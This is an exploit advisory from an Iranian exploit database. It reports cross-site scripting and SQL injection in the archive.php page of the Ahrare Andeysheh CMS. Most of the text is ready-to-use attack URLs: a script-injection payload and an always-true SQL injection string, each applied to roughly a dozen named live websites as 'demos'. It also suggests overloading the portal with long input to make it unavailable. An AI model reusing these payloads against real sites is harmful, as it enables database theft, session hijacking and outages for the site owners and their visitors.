#####################################
# Iranian Exploit DataBase
# Ahrare Andeysheh Cms Multiple Vulnerabilities
# Vulnerability : Xss & Sql Injection & Poc
# Vulnerability on : archive.php
# Version : All Versions
# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
# Vendor site : http://www.ahrareandeysheh.com/
# Author : IeDb.Ir
# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir
# Vulnerability attack information site : http://xssed.Ir/
# Archive Exploit = http://kkli.ir/aOFh6
#####################################
# Bug :
[Xss And Sql Injection] to from=1395/01/01
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999
Poc :
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--
# Dem0 [ Xss And Sqli]
http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
Demo [Poc]
http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--
Insert Java Code Or very long input, and disrupt the system And This portal will be unavailable.
# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
#####################################
Tnks To : All Member In Iedb.ir And Iedb.ir/acc
B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4
Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum
#####################################
# Archive Exploit = http://iedb.ir/exploits-5061.html
#####################################
